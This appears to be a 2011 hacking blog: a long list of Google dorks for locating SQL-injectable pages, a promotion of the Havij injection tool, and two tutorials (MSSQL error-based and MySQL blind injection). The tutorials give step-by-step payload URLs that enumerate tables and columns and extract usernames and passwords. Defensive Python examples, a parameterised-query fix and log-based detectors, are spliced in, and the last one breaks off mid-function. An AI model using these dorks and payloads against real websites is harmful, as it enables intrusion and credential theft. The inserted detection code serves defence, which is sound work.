Google Dorks to find SQL injection pages



inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:info.php?id=
inurl:pro.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=


Advanced SQLi Tool




Havij is an automated SQL injection tool that helps penetration testers find and exploit SQL injection vulnerabilities on a web page.

It can take advantage of a vulnerable web application. Using this software, the user can fingerprint the back-end database, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements and even access the underlying file system and execute commands on the operating system.

What sets Havij apart from similar tools is its injection methods. The success rate is more than 95% at injecting vulnerable targets using Havij.

The user-friendly GUI (Graphical User Interface) of Havij and its automated settings and detections make it easy to use for everyone, even amateur users.
Features:
1. Supported databases with injection methods:
   1. MsSQL 2000/2005 with error
   2. MsSQL 2000/2005 no error (union based)
   3. MySQL (union based)
   4. MySQL blind
   5. MySQL error based
   6. Oracle (union based)
   7. MsAccess (union based)
2. Automatic database detection
3. Automatic type detection (string or integer)
4. Automatic keyword detection (finding the difference between the positive and negative response)
5. Trying different injection syntaxes
6. Proxy support
7. Real-time results
8. Options for replacing spaces with /**/, +, ... against IDS or filters
9. Avoiding strings (bypass for magic_quotes and similar filters)
10. Bypassing illegal union
11. Fully customizable HTTP headers (like referer and user agent)
12. Load cookie from site for authentication
13. Guessing tables and columns in MySQL < 5 (also in blind) and MsAccess
14. Fast retrieval of tables and columns for MySQL
15. Multi-thread admin page finder
16. Multi-thread online MD5 cracker
17. Getting DBMS information
18. Getting tables, columns and data
19. Command execution (MSSQL only)
20. Reading system files (MySQL only)
21. Insert/update/delete data







Saf3 Sql Injector v8.6 Released



download Saf3 Sql Injector v8.6

at Saturday, October 01, 2011
Labels: Hacking, SQL, Tools



Thursday, 29 September 2011


MSSQL - injection, method of attack! Complete Tutorial By M4ST3R M!ND


MSSQL - injection, method of attack!
###########################





1.1 Introduction
1.2 How to find a vulnerable page?
1.3 How to prove that the site is vulnerable?
1.4 How to find the version / name of the DB?
1.5 How to discover the table names (table_name)?
1.6 How to discover the column names (column_name)?
1.7 How to get data from the tables that interest us (e.g. name, pass, email, etc.)?
1.8 Conclusion


[1.1 Introduction]
############

This lesson will try to explain MSSQL injection, assuming you already know the other techniques.
You will have the opportunity to learn how this method is used as a favourite way to obtain information (name, password and login) or various other information.
MSSQL injection can be used against products created by the well-known company Microsoft.
This type of injection therefore deals with sites that are coded in ASP / ASPX etc.

There are several types of attack in this way:

* - Normal MSSQL SQL injection attacks
* - MSSQL injection in web services (SOAP injection)
* - Union-based MSSQL injection attacks
* - ODBC error attack with "Convert"
* - MSSQL blind SQL injection attacks, etc. ..

For this write-up, the following type of attack will be used:

"Attack via the ODBC error message 'Convert'"


[1.2 How to find a vulnerable page? ]
############################

Finding a vulnerable page is easy. For this we can use the services of the giant company Google.

Let's open: Google

I write, for example: inurl: "products". "ID"
inurl: "neus.asp" menu "
inurl: "content.asp" under "
inurl: "games.asp" ID "
etc. ... (I gave some examples; you can now use your own logic for better dorks)

[1.3 How to prove that the site is vulnerable? ]
##################################

We can find this out very easily by adding a single quote (') to the ID parameter of the page.
If the response we get back is an error page, the page is vulnerable. Examples:

++++++++++++++++++++++++++++++++++++++
/ Microsoft Access ODBC driver /
++++++++++++++++++++++++++++++++++++++
/ Unclosed quotation mark /
++++++++++++++++++++++++++++++++++++++
/ Microsoft OLE DB Provider for Oracle /
++++++++++++++++++++++++++++++++++++++
/ Division by zero in /
++++++++++++++++++++++++++++++++++++++

These are some of the most common responses shown by pages that are vulnerable to MSSQL injection.

Now let's show with an example where to put the single quote (').

For example:

--------------------------------------
http://www.localhost.com/news.asp?id=100'
--------------------------------------

Now the error that is displayed:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.

/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

This page is vulnerable!
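What the single-quote test above actually exercises, shown as an added example that is not part of the original tutorial: a lookup that concatenates the id into its SQL text (the pattern behind a news.asp?id= page), the same lookup written with a typed, bound parameter, and a request handler that keeps the driver's error text out of the response. The page never shows the application's own code, so this is a reconstruction of the pattern in Python with the built-in sqlite3 module, a constructed news table and hypothetical function names, not the author's code.

```python
import sqlite3

SERVER_LOG = []  # what the operator gets to see; never sent to the client


def make_db():
    """Constructed in-memory stand-in for the tutorial's news table (sample data, not the page's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(100, "Release notes"), (101, "Maintenance window")])
    return conn


def vulnerable_lookup(conn, raw_id):
    """The pattern behind news.asp?id=: the parameter is pasted into the SQL text.
    A trailing quote therefore changes the statement, not the value, and the
    database raises a syntax error, which is exactly what the section 1.3 test looks for."""
    sql = "SELECT title FROM news WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def safe_lookup(conn, raw_id):
    """Hardened form: enforce the expected type, then bind the value as a parameter
    so the SQL text is fixed no matter what the client sends."""
    try:
        article_id = int(raw_id)
    except ValueError:
        return None  # reject before touching the database
    return conn.execute("SELECT title FROM news WHERE id = ?", (article_id,)).fetchall()


def outcome(conn, raw_id, lookup):
    """Classify what a given id does against a given lookup: 'db-error', 'rejected' or 'rows:<n>'."""
    try:
        rows = lookup(conn, raw_id)
    except sqlite3.Error:
        return "db-error"
    if rows is None:
        return "rejected"
    return "rows:%d" % len(rows)


def handle_request(conn, raw_id, lookup):
    """Second fix, independent of the first: the driver's message goes to the server log,
    the client only ever sees a fixed, uninformative error page."""
    try:
        rows = lookup(conn, raw_id)
    except sqlite3.Error as exc:
        SERVER_LOG.append("db error for id=%r: %s" % (raw_id, exc))
        return (500, "An error occurred")
    if rows is None:
        return (400, "Bad request")
    return (200, rows[0][0] if rows else "Not found")


if __name__ == "__main__":
    db = make_db()
    for probe in ("100", "100'"):
        print(repr(probe), "vulnerable:", outcome(db, probe, vulnerable_lookup),
              "safe:", outcome(db, probe, safe_lookup))
    print(handle_request(db, "100'", vulnerable_lookup), SERVER_LOG[-1])
```

The generic error page alone does not remove the injection: with vulnerable_lookup the statement is still attacker-controlled, it merely stops leaking the driver's wording that the rest of this tutorial reads values out of. The bound parameter in safe_lookup is the actual fix; the error handling only removes the oracle.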


[1.4 How to find the version / DB name? ]
############################


Let's make it easier to understand with an example:

Version:

--------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(@@version))--
--------------------------------------------------------------------


And we get something like this:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting nvarchar value 'MS SQL Server 2008 (SP1) - 10.0.2531.0 (64) 29. March 2009 10:11:52 Copyright © 1988-2008 Microsoft Corporation Edition (64-bit), the operating systems Windows NT 6.0 <x64> (Build 6002: Service Pack 2) (SM)' to data type int.

/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



Now let's find the DB_Name:

---------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(DB_Name()))--
---------------------------------------------------------------------

e.g.


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting nvarchar value 'EVILZONE_CREW_DB' to data type int.

/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[1.5 How to discover the table names (table_name)]
######################################


Finding the table names of the database goes through this method.

For example:

----------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables))--
----------------------------------------------------------------------------------------------------------------


And now there will be an error such as:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting nvarchar value 'Users' to data type int.

/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


That is, in this case the first table (table_name) is 'Users'. Now let's find the next table:

For example:

--------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--
--------------------------------------------------------------------------------------------------------------------------------------------------


And now the same error message will appear and give another table:

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting nvarchar value 'news' to data type int.

/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Another table in this case is 'news'.

Now, to find the third table (table_name), it goes like this:

For example:


--------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users','news')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------


The third table appears to us:


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting nvarchar value 'categories' to data type int.

/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


So the third table is 'categories', and so on until you find all the tables.

For example:


--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users','news','Categories')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

[1.6 How to discover the column names (column_name)]
###########################################

- If you want the column_name for the table 'Users', go like this:

For example:


--------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users'))--
--------------------------------------------------------------------------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting nvarchar value 'Name' to data type int.

/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

So the column name for the table (table_name) 'Users' is 'name'.

Now let's find the other column (column_name) in the same table 'Users':

For example:


--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('name')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting nvarchar value 'password' to data type int.

/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


The other column name (column_name) is 'password'. Now let's find the next column_name:

For example:

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('name','password')))--
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting nvarchar value 'emailaddress' to data type int.

/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Therefore the third column_name is 'emailaddress', and so on until the end, to find all of the columns (column_name)!



[1.7 How to get the data that interests you (user name, pass, email, etc.)]
#####################################################


To do this you need nothing different from what we mentioned before.
In this section, all that needs to be done is to use the table (table_name) and the column names (column_name) found in the earlier results.

In this section will be used:
Table_name = Users
Column_name = user name, password, emailaddress!

Now let's substitute them into the example:


-------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 name from Users))--
-------------------------------------------------------------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting nvarchar value 'Administrator' to data type int.

/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

user name : Administrator

Now replace the first column "name" with the second column "password":

For example:


-------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 password from Users))--
-------------------------------------------------------------------------------------------

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting nvarchar value '123456' to data type int.

/MSN/shared/includes/main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


password: administratorpassword123

Now for the remaining column it works the same as above:

For example:


-----------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id=100+or+1=convert(int,(select top 1 emailaddress from Users))--
-----------------------------------------------------------------------------------------------

emailaddress: king.cyborg@yahoo.com

So here we have obtained some info: the name / pass and emailaddress of the page.

user name: Administrator
password: administratorpassword123
emailaddress: king.cyborg@yahoo.com

[ 1.8 Conclusion ]
############

=============================================================================
http://www.localhost.com/news.asp?id=100'
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...(@@version))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...(db_name()))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members' , 'categories')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users'))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username' , 'password')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 username from Users))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 password from Users))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 emailaddress from Users))--
=============================================================================
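For the defender's side of the request sequence summarised above, here is an added detection example in Python; it is not part of the original post. It URL-decodes and normalises each request's query string, matches the request-side signatures of this technique (convert(int, ...), @@version / db_name(), information_schema, a trailing SQL comment, an unbalanced single quote), checks a response body for verbose driver error fragments of the kind section 1.3 lists, and tallies hits per source address. The IIS-like log format, the sample lines, and the rule and function names are constructed for the example; the response signatures are the standard SQL Server / OLE DB wordings, which I am assuming rather than taking from the page.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Request-side signatures of the error-based technique walked through in sections 1.3 to 1.7.
REQUEST_RULES = {
    "type-conversion-probe": re.compile(r"convert\s*\(\s*int\b"),
    "version-or-dbname-fingerprint": re.compile(r"@@version|\bdb_name\s*\("),
    "schema-enumeration": re.compile(r"information_schema\.(tables|columns)"),
    "comment-terminator": re.compile(r"--\s*$"),
}

# Driver/DBMS error fragments of the kind section 1.3 lists. These are the standard SQL Server /
# OLE DB wordings (an assumption, not taken from the page) and should never reach a client.
RESPONSE_SIGNATURES = (
    "microsoft ole db provider",
    "odbc driver",
    "unclosed quotation mark",
    "conversion failed when converting",
)

# Constructed, IIS-like log format assumed here: date time client-ip method uri-stem uri-query status
LOG_LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\S*) (\d{3})$")

# Constructed sample traffic: one ordinary reader, one source running the tutorial's sequence.
SAMPLE_LOG = """\
2011-09-29 10:11:52 198.51.100.7 GET /news.asp id=100 200
2011-09-29 10:11:53 198.51.100.7 GET /news.asp id=101 200
2011-09-29 10:12:01 203.0.113.5 GET /news.asp id=100%27 500
2011-09-29 10:12:05 203.0.113.5 GET /news.asp id=100+or+1=convert(int,(@@version))-- 500
2011-09-29 10:12:09 203.0.113.5 GET /news.asp id=100+or+1=convert(int,(select+top+1+table_name+from+information_schema.tables))-- 500
""".splitlines()


def normalize_query(raw_query):
    """Decode %xx and '+' escapes, collapse whitespace and case, so rules see what the SQL engine saw."""
    return re.sub(r"\s+", " ", unquote_plus(raw_query)).strip().lower()


def classify_request(raw_query):
    """Names of every rule the query string trips; an empty list means nothing matched."""
    q = normalize_query(raw_query)
    hits = [name for name, rx in REQUEST_RULES.items() if rx.search(q)]
    if q.count("'") % 2 == 1:  # the lone single quote used in the section 1.3 test
        hits.append("unbalanced-quote")
    return hits


def leaks_db_error(body):
    """Response-side check: which verbose error fragments a page body contains (case-insensitive)."""
    lowered = body.lower()
    return [sig for sig in RESPONSE_SIGNATURES if sig in lowered]


def scan_log(lines):
    """Per-source tally {client_ip: {rule: count}}, only for requests that tripped at least one rule."""
    report = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        _, _, ip, _, _, query, status = m.groups()
        hits = classify_request(query)
        if not hits:
            continue
        for rule in hits:
            report[ip][rule] += 1
        if status == "500":  # a server error on a probe is the oracle the technique depends on
            report[ip]["server-error-on-probe"] += 1
    return {ip: dict(rules) for ip, rules in report.items()}


def suspicious_sources(report, min_rules=2):
    """Sources that tripped at least min_rules distinct rules, most rules first."""
    ranked = [(ip, rules) for ip, rules in report.items() if len(rules) >= min_rules]
    ranked.sort(key=lambda item: -len(item[1]))
    return [ip for ip, _ in ranked]


if __name__ == "__main__":
    findings = scan_log(SAMPLE_LOG)
    for ip in suspicious_sources(findings):
        print(ip, findings[ip])
```

Requiring two distinct rules per source keeps a single stray quote in a search box from raising an alert on its own, while the full sequence above trips five or six rules from one address within seconds. The response-side check is the more durable control: if leaks_db_error ever returns a match on a production page, the application is exposing the driver's wording regardless of whether anyone is probing it yet.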

at Thursday, September 29, 2011
Labels: Hacking, SQL



[Tut] Blind SQL Injection (Private) M4STER M!ND








Let's start with advanced stuff.

I will be using our example


Code:
http://www.site.com/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc...

then when we want to test it for blind sql injection attack


Code:
http://www.site.com/news.php?id=5 and 1=1 <--- this is always true

and the page loads normally, that's ok.

now the real test


Code:
http://www.site.com/news.php?id=5 and 1=2 <--- this is false

so if some text, picture or some content is missing on the returned page then that site is vulnerable to blind sql injection.

1) Get the MySQL version

to get the version in blind attack we use substring

i.e


Code:
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e


Code:
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works

when select doesn't work then we use a subselect

i.e


Code:
http://www.site.com/news.php?id=5 and (select 1)=1

if the page loads normally then subselects work.

then we gonna see if we have access to mysql.user

i.e


Code:
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if the page loads normally we have access to mysql.user and then later we can pull some passwords using the load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend

i.e.


Code:
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1

(with limit 0,1 our query here returns 1 row of data, because the subselect returns only 1 row; this is very important.)

then if the page loads normally without content missing, the table users exists.
if you get FALSE (some article missing), just change the table name until you guess the right one

let's say that we have found that table name is users, now what we need is column name.

the same as table name, we start guessing. Like i said before try the common names for columns.

i.e


Code:
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page loads normally we know that the column name is password (if we get false then try common names or just guess)

here we merge 1 with the column password, then substring returns the first character (,1,1)


4). Pull data from database

we found the table users and the columns username, password, so we're going to pull characters from them.
Code:

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users.

substring here returns the first character, 1 character in length. ascii() converts that 1 character into its ascii value

and then compares it using the greater-than symbol > .

so if the ascii value is greater than 80, the page loads normally. (TRUE)

we keep trying until we get false.



Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing


Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher


Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

then let's check the second character.


Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that I changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in length)



Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

TRUE, the page loads normally, higher.


Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>107

FALSE, lower number.


Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>104

TRUE, higher.


Code:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>105

FALSE!!!

we know that the second character is char(105) and that is 'i'. We have 'ci' so far

so keep incrementing until you get to the end. (when >0 returns false we know that we have reached the end).

There are some tools for Blind SQL Injection, I think sqlmap is the best, but I'm doing everything manually,

because that makes you a better SQL INJECTOR
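As a defender's counterpart to the manual character-by-character extraction above, here is an added example (not the author's code) that finds this traffic pattern in web server logs. It collapses every integer literal in a query string to N, so that a sweep of >80, >95, >98, >99 requests against the same path from one source shares a single shape, and it separately flags a source that requested both a true and a false tautology (and 1=1 / and 1=2), which is the very first check the tutorial performs. It generalises past the page's examples: any numeric value being swept inside a boolean clause is caught, not only the ascii(substring(...)) form. The log format, the sample lines and the function names are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed log format assumed here: timestamp client-ip method path query
LOG_LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S*)$")
INTEGER = re.compile(r"\b\d+\b")
# the "and 1=1" / "and 1=2" pair the tutorial opens with (also catches "or 2=2" style variants)
TAUTOLOGY = re.compile(r"\b(?:and|or) \(?(\d+)=(\d+)\)?")

# Constructed sample traffic: a normal reader, then one source running the boolean checks and a
# sweep of ascii(substring(@@version,...))>N comparisons like the ones shown above.
SAMPLE_LOG = """\
2011-09-30T08:00:01 198.51.100.7 GET /news.php id=5
2011-09-30T08:00:02 198.51.100.7 GET /news.php id=6
2011-09-30T08:00:03 198.51.100.7 GET /news.php q=cats+and+dogs
2011-09-30T08:01:00 203.0.113.9 GET /news.php id=5+and+1=1
2011-09-30T08:01:02 203.0.113.9 GET /news.php id=5+and+1=2
2011-09-30T08:01:10 203.0.113.9 GET /news.php id=5+and+ascii(substring(@@version,1,1))>48
2011-09-30T08:01:11 203.0.113.9 GET /news.php id=5+and+ascii(substring(@@version,1,1))>52
2011-09-30T08:01:12 203.0.113.9 GET /news.php id=5+and+ascii(substring(@@version,1,1))>53
2011-09-30T08:01:13 203.0.113.9 GET /news.php id=5+and+ascii(substring(@@version,1,1))>54
2011-09-30T08:01:14 203.0.113.9 GET /news.php id=5+and+ascii(substring(@@version,2,1))>45
2011-09-30T08:01:15 203.0.113.9 GET /news.php id=5+and+ascii(substring(@@version,2,1))>46
2011-09-30T08:01:16 203.0.113.9 GET /news.php id=5+and+ascii(substring(@@version,2,1))>47
""".splitlines()


def normalize(raw_query):
    """Decode %xx and '+' escapes, collapse whitespace and case."""
    return re.sub(r"\s+", " ", unquote_plus(raw_query)).strip().lower()


def shape(query):
    """Replace every integer literal with N, so requests differing only in the probed value share a shape."""
    return INTEGER.sub("N", query)


def find_blind_sequences(lines, min_variants=5):
    """Two kinds of finding per (source, path): a TRUE/FALSE tautology pair, and a sweep of at least
    min_variants requests with the same shape but different numbers. Ordinary browsing does not
    put a boolean clause in a query string, so queries without 'and'/'or' are skipped outright."""
    sweeps = defaultdict(set)  # (ip, path, shape) -> distinct tuples of integer literals seen
    pairs = defaultdict(set)   # (ip, path) -> {"true", "false"} outcomes requested
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        _, ip, _, path, raw = m.groups()
        q = normalize(raw)
        if not re.search(r"\b(and|or)\b", q):
            continue
        sweeps[(ip, path, shape(q))].add(tuple(INTEGER.findall(q)))
        for lhs, rhs in TAUTOLOGY.findall(q):
            pairs[(ip, path)].add("true" if lhs == rhs else "false")
    findings = []
    for (ip, path), seen in sorted(pairs.items()):
        if seen == {"true", "false"}:
            findings.append(("boolean-pair", ip, path))
    for (ip, path, s), variants in sorted(sweeps.items()):
        if len(variants) >= min_variants:
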